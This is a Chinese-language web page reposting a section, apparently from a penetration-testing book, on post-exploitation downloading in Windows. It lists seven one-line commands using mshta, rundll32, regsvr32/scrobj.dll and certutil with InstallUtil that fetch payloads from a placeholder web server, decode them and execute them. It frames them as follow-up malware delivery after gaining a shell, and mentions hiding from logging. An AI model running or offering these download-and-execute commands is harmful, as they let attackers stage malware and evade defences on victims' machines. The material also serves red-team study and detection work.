文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
8.6 在 Windows 中使用命令行从 Internet 下载文件
如果您通过应用程序漏洞获得执行权限,通过 Office 文件或 PDF 获得 Shell,那么接下来的步骤可能是下载并执行后续恶意软件。对于这些情况,我们可以利用 Windows“功能”完成工作。大多数例子来自 arno0x0x 和 @subtee 的研究成果。
- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))。
- mshta http://webserver/payload.hta。
- rundll32.exe javascript:"..\mshtml,RunHTMLApplication";o=GetObject("script: http:// webserver/payload.sct");window.close();。
- regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll。
- certutil -urlcache -split -f http://webserver/payload payload。
- certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\ v4.0.30319\ InstallUtil/ logfile= /LogToConsole=false /u payload.dll。
- certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.exe & payload.exe。
这些只是一些示例,还有大量的方法通过命令行执行后续代码。您可以找到隐藏传统日志记录的其他技术。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论